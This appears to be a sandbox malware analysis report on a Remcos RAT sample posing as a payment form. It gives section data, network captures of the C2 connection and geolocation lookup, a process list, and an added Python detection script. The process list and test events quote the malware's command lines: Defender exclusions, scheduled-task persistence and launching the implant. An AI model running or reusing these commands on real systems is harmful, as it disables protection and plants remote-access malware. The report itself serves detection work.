Note: IMAGE_DIRECTORY_ENTRY_SECURITY holds a file offset rather than an RVA, which is why it maps to no section; it points at the 0x3608-byte Authenticode blob that carries the certificate chain listed above. The presence of a known signer's certificate says nothing by itself: verify the signature against the file (for example with signtool verify /pa) before treating the file as signed. The non-empty COM_DESCRIPTOR entry is the CLR header, i.e. this is a managed (.NET) executable.
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity  File Type  Entropy  Characteristics
.text   0x2000           0x1298ec      0x129a00  f9074bdc3e4c609ac3e87b9b528786c4  False     0.7907           data       7.6646   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x12c000         0x2588        0x2600    9f23fd2b35dfeaffc23a0f595347c8f9  False     0.8753           data       7.5774   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x130000         0xc           0x200     4fbb471a8ef5c6fdc104e1206fd81f16  False     0.0449           data       0.1019   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Note: .text is 0x129a00 = 1,219,072 raw bytes, about 98% of the 1,243,656-byte file, and its entropy of 7.66 out of a possible 8 means it is essentially an encrypted or compressed blob rather than plain IL and metadata. Together with the single mscoree.dll import and the jump-through-IAT entry stub this is the layout of a packed .NET loader: the real payload is decrypted at runtime and never appears in the file in readable form.
Name           RVA       Size    Type                                                                                Language  Country  ZLIB Complexity
RT_ICON        0x12c100  0x2016  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                         -         -        0.9505
RT_GROUP_ICON  0x12e128  0x14    data                                                                                -         -        1.05
RT_VERSION     0x12e14c  0x23c   data                                                                                -         -        0.4685
RT_MANIFEST    0x12e398  0x1ea   XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators   -         -        0.5490
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                           Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2024-11-24T08:23:49.109682+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection         1         192.168.2.9  49754        212.162.149.226  9285       TCP
2024-11-24T08:23:52.905180+0100  2803304  ETPRO MALWARE Common Downloader Header Pattern HCa  3         192.168.2.9  49761        178.237.33.50    80         TCP
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 24, 2024 08:23:47.674302101 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:23:47.794027090 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:23:47.794109106 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:23:47.800215960 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:23:47.919892073 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:23:49.057621956 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:23:49.109682083 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:23:49.311713934 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:23:49.321471930 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:23:49.441055059 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:23:49.441118956 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:23:49.560684919 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:23:49.944257975 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:23:49.957482100 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:23:50.076893091 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:23:50.154537916 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:23:50.265939951 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:23:51.444372892 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:23:51.564573050 CET  80           49761      178.237.33.50    192.168.2.9
Nov 24, 2024 08:23:51.570478916 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:23:51.614166021 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:23:51.733948946 CET  80           49761      178.237.33.50    192.168.2.9
Nov 24, 2024 08:23:52.904948950 CET  80           49761      178.237.33.50    192.168.2.9
Nov 24, 2024 08:23:52.905179977 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:23:52.915851116 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:23:53.035423994 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:23:53.904076099 CET  80           49761      178.237.33.50    192.168.2.9
Nov 24, 2024 08:23:53.904167891 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:24:20.331466913 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:24:20.339855909 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:24:20.459458113 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:24:50.756966114 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:24:50.791527987 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:24:50.911089897 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:25:21.160660028 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:25:21.162004948 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:25:21.281574965 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:25:41.110745907 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:25:41.438613892 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:25:42.079134941 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:25:43.344917059 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:25:45.860702038 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:25:50.905225039 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:25:51.564254045 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:25:51.569518089 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:25:51.689155102 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:26:00.954273939 CET  49761        80         192.168.2.9      178.237.33.50
Nov 24, 2024 08:26:21.984798908 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:26:21.986206055 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:26:22.105715990 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:26:52.407346964 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:26:52.412792921 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:26:52.532771111 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:27:22.828332901 CET  9285         49754      212.162.149.226  192.168.2.9
Nov 24, 2024 08:27:22.829530001 CET  49754        9285       192.168.2.9      212.162.149.226
Nov 24, 2024 08:27:22.949120998 CET  9285         49754      212.162.149.226  192.168.2.9
Note: two patterns in this table are worth keeping for detection. On the 212.162.149.226:9285 stream, after the initial exchange every round trip is opened by the server (08:24:20, 08:24:50, 08:25:21, 08:25:51, 08:26:21, 08:26:52, 08:27:22) at a steady 30 s interval and answered by the client within milliseconds, i.e. a server-driven keep-alive. On the 178.237.33.50:80 stream, the six client-only segments from 08:25:41 to 08:26:00 arrive at roughly doubling intervals (0.3, 0.6, 1.3, 2.5, 5.0, 10.0 s) with no reply: TCP retransmissions after geoplugin.net stopped responding on the already-used connection.
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 24, 2024 08:23:51.151767969 CET  49836        53         192.168.2.9  1.1.1.1
Nov 24, 2024 08:23:51.289314985 CET  53           49836      1.1.1.1      192.168.2.9
Nov 24, 2024 08:24:03.673151970 CET  52309        53         192.168.2.9  1.1.1.1
Nov 24, 2024 08:24:03.811409950 CET  53           52309      1.1.1.1      192.168.2.9
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name           Type            Class        DNS over HTTPS
Nov 24, 2024 08:23:51.151767969 CET  192.168.2.9  1.1.1.1  0xbc71    Standard query (0)  geoplugin.net  A (IP address)  IN (0x0001)  false
Nov 24, 2024 08:24:03.673151970 CET  192.168.2.9  1.1.1.1  0x598e    Standard query (0)  geoplugin.net  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                                           CName                            Address        Type                    Class        DNS over HTTPS
Nov 24, 2024 08:23:28.394833088 CET  1.1.1.1    192.168.2.9  0xc243    No error (0)  shed.dual-low.s-part-0035.t-0009.t-msedge.net  s-part-0035.t-0009.t-msedge.net  -              CNAME (Canonical name)  IN (0x0001)  false
Nov 24, 2024 08:23:28.394833088 CET  1.1.1.1    192.168.2.9  0xc243    No error (0)  s-part-0035.t-0009.t-msedge.net                -                                13.107.246.63  A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:23:51.289314985 CET  1.1.1.1    192.168.2.9  0xbc71    No error (0)  geoplugin.net                                  -                                178.237.33.50  A (IP address)          IN (0x0001)  false
Nov 24, 2024 08:24:03.811409950 CET  1.1.1.1    192.168.2.9  0x598e    No error (0)  geoplugin.net                                  -                                178.237.33.50  A (IP address)          IN (0x0001)  false
Note: the t-msedge.net answer (transaction 0xc243) has no matching entry in the query table and arrives before the sample's first lookup; it is Microsoft CDN background traffic from the analysis VM, not an indicator for this sample. The two geoplugin.net lookups, twelve seconds apart, are the sample's own: the second is a fresh resolution rather than a cached one, which fits a second process instance starting up.
                                            • geoplugin.net
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.9  49761        178.237.33.50   80                8156  C:\ProgramData\AppUpdate\remcos.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:23:51.614166021 CET  71                 OUT        GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
(The 71 bytes are exactly the three lines above plus the terminating CRLF: no User-Agent, no Accept, a request shape no browser produces. geoplugin.net/json.gp is the geolocation lookup Remcos performs on start-up to report the victim's country to the operator, so a request to it from a non-browser process is a useful detection on its own.)
Nov 24, 2024 08:23:52.904948950 CET  1170               IN         HTTP/1.1 200 OK
                                            date: Sun, 24 Nov 2024 07:23:52 GMT
                                            server: Apache
                                            content-length: 962
                                            content-type: application/json; charset=utf-8
                                            cache-control: public, max-age=300
                                            access-control-allow-origin: *
                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                            Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
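The Suricata, DNS and HTTP tables above and the process list below together give everything needed to write host and network detections for this chain: a PowerShell Add-MpPreference exclusion, a scheduled task created from an XML file in Temp, WScript running install.vbs from Temp, the payload launched from AppData\Roaming and ProgramData, the geoplugin.net lookup by the implant, and the C2 connection. The script below is an added example (not Joe Sandbox or Sigma code) that implements those rules in Python and runs them over constructed Sysmon-style events. The field names (Image, CommandLine, QueryName, DestinationIp, DestinationPort) follow Sysmon event IDs 1, 3 and 22; the five process command lines are copied from the report's process list; the base64-encoded PowerShell variant, the benign baseline and the browser lookup are made up to show what does and does not fire; and the rule names are ours, chosen to echo the report's Sigma hits.

```python
"""Detection logic for the behaviours in this report, run over CONSTRUCTED
Sysmon-style events (ID 1 process create, 3 network connect, 22 DNS query).
Added example, not Joe Sandbox or Sigma code: the rule names are ours and only
echo the report's Sigma hits, the process command lines are copied from its
process list, and the encoded-PowerShell variant, benign baseline and browser
lookup are made up here to show what does and does not fire."""
import base64
import re

TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
STAGING_RE = re.compile(r"^(C:\\ProgramData\\|C:\\Users\\[^\\]+\\AppData\\Roaming\\)", re.I)
ENCODED_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)   # -e, -ec, -enc, -EncodedCommand
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
REPORT_C2 = {("212.162.149.226", 9285)}          # from the Suricata and TCP tables above


def basename(path: str) -> str:
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def decoded_command_line(cmd: str) -> str:
    """Append the plaintext of an -EncodedCommand payload (UTF-16LE base64) so rules see it."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmd                                   # not really base64: leave the line alone


def rule_defender_exclusion(ev):
    return (ev["EventID"] == 1 and basename(ev["Image"]) in ("powershell.exe", "pwsh.exe")
            and re.search(r"Add-MpPreference.*-Exclusion", decoded_command_line(ev["CommandLine"]), re.I) is not None)


def rule_schtasks_xml_from_temp(ev):
    cmd = ev.get("CommandLine", "").lower()
    return (ev["EventID"] == 1 and basename(ev["Image"]) == "schtasks.exe"
            and "/create" in cmd and "/xml" in cmd and TEMP_RE.search(cmd) is not None)


def rule_script_host_from_temp(ev):
    return (ev["EventID"] == 1 and basename(ev["Image"]) in ("wscript.exe", "cscript.exe")
            and TEMP_RE.search(ev["CommandLine"]) is not None)


def rule_exec_from_staging_dir(ev):
    """Binary started from ProgramData or Roaming, directly or via `cmd /c`."""
    if ev["EventID"] != 1:
        return False
    targets = [ev["Image"]]
    if basename(ev["Image"]) == "cmd.exe":
        m = re.search(r"/c\s+\"?([^\"]+\.exe)", ev["CommandLine"], re.I)
        targets += [m.group(1)] if m else []
    return any(STAGING_RE.search(t) for t in targets)


def rule_geoplugin_from_non_browser(ev):
    """Remcos fetches geoplugin.net/json.gp at start-up; browsers are exempt."""
    if basename(ev["Image"]) in BROWSERS:
        return False
    host = {22: ev.get("QueryName", ""), 3: ev.get("DestinationHostname", "")}.get(ev["EventID"], "")
    return host.lower().endswith("geoplugin.net")


def rule_known_c2(ev):
    return ev["EventID"] == 3 and (ev["DestinationIp"], ev["DestinationPort"]) in REPORT_C2


RULES = {
    "Defender exclusion added via Add-MpPreference": rule_defender_exclusion,
    "Scheduled task created from XML in Temp": rule_schtasks_xml_from_temp,
    "WScript/CScript running a script from Temp": rule_script_host_from_temp,
    "Executable launched from ProgramData/Roaming": rule_exec_from_staging_dir,
    "geoplugin.net lookup by non-browser process": rule_geoplugin_from_non_browser,
    "Connection to Remcos C2 from this report": rule_known_c2,
}


def detect(events):
    """Return (event index, rule name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events) for name, fn in RULES.items() if fn(ev)]


SAMPLE_EVENTS = [
    # command lines copied from the report's process list (Target IDs 3, 7, 10, 11, 13)
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"'},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"'},
    {"EventID": 1, "Image": r"C:\Users\user\AppData\Roaming\iKgKaogJ.exe",
     "CommandLine": r"C:\Users\user\AppData\Roaming\iKgKaogJ.exe"},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\AppUpdate\remcos.exe"'},
    # network events modelled on the DNS, HTTP and Suricata tables
    {"EventID": 22, "Image": r"C:\ProgramData\AppUpdate\remcos.exe", "QueryName": "geoplugin.net"},
    {"EventID": 3, "Image": r"C:\ProgramData\AppUpdate\remcos.exe", "DestinationIp": "212.162.149.226", "DestinationPort": 9285},
    # constructed: the same exclusion hidden behind -enc, then two benign baselines
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + base64.b64encode("Add-MpPreference -ExclusionPath 'C:\\ProgramData\\AppUpdate'".encode("utf-16le")).decode()},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "powershell.exe Get-Process"},
    {"EventID": 22, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "QueryName": "geoplugin.net"},
]
```

`detect(SAMPLE_EVENTS)` fires exactly one rule on each of the first eight events and nothing on the two baselines. The point of `decoded_command_line` is that the report's own exclusion command is in clear text, but the same cmdlet behind `-EncodedCommand` would slip past a plain string match, so the rule looks at both forms. The ProgramData/Roaming rule is the noisiest of the set in environments where users run installers from AppData; tune it with an allowlist of signed publishers rather than dropping it, because it is the one rule here that fires on the persistence copy (iKgKaogJ.exe) before any network activity.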



                                            Target ID:0
                                            Start time:02:23:29
                                            Start date:24/11/2024
                                            Path:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
                                            Imagebase:0x1b0000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:02:23:35
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
                                            Imagebase:0x220000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:02:23:35
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:02:23:35
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
                                            Imagebase:0x220000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:02:23:35
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:02:23:35
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"
                                            Imagebase:0x7e0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:02:23:36
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:02:23:36
                                            Start date:24/11/2024
                                            Path:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
                                            Imagebase:0x8a0000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.1407344012.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:10
                                            Start time:02:23:37
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\wscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                                            Imagebase:0xca0000
                                            File size:147'456 bytes
                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:11
                                            Start time:02:23:37
                                            Start date:24/11/2024
                                            Path:C:\Users\user\AppData\Roaming\iKgKaogJ.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\iKgKaogJ.exe
                                            Imagebase:0xb90000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 53%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:13
                                            Start time:02:23:39
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0xc50000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:14
                                            Start time:02:23:39
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:15
                                            Start time:02:23:39
                                            Start date:24/11/2024
                                            Path:C:\ProgramData\AppUpdate\remcos.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\ProgramData\AppUpdate\remcos.exe
                                            Imagebase:0xa00000
                                            File size:1'243'656 bytes
                                            MD5 hash:FC5A80ADF45D78FFA834283D0A78F9F6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 53%, ReversingLabs
                                            • Detection: 61%, Virustotal, Browse
                                            Reputation:low
                                            Has exited:true

                                            Target ID:16
                                            Start time:02:23:45
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe"
                                            Imagebase:0x220000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:17
                                            Start time:02:23:45
                                            Start date:24/11/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:18
                                            Start time:02:23:45
                                            Start date:24/11/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
                                            Imagebase:0x220000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
